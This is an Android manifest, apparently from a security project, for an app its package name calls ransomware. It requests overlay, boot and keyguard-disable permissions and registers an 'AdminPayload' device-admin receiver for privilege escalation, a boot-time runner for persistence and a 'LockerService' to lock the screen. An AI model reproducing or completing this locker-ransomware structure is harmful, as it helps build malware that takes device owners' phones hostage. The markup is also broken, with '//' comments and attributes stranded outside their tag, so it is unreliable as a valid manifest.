<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="projects.security.ransomware_1">
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />

    <application

        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity

            android:name=".StartActivity"

            android:label="@string/app_name"
            android:theme="@style/AppTheme.NoActionBar">

            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>

        </activity>
        //Attempt escalation http://developer.android.com/guide/topics/admin/device-admin.html#sample
        <receiver android:name=".AdminPayload"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            android:label="@string/app_name"
            android:description="@string/app_admin_description"
            <meta-data android:name="android.app.device_admin" android:resource="@xml/escalation"/>
            <intent-filter>
                    <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                    <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED"/>
                    <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLED"/>
            </intent-filter>
        </receiver>

        //Run on startup
        <receiver android:name=".BootRunner">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>

        //Lock the screen
        <service
            android:name=".LockerService"
            android:label="Locker Service" >
        </service>

    </application>

</manifest>
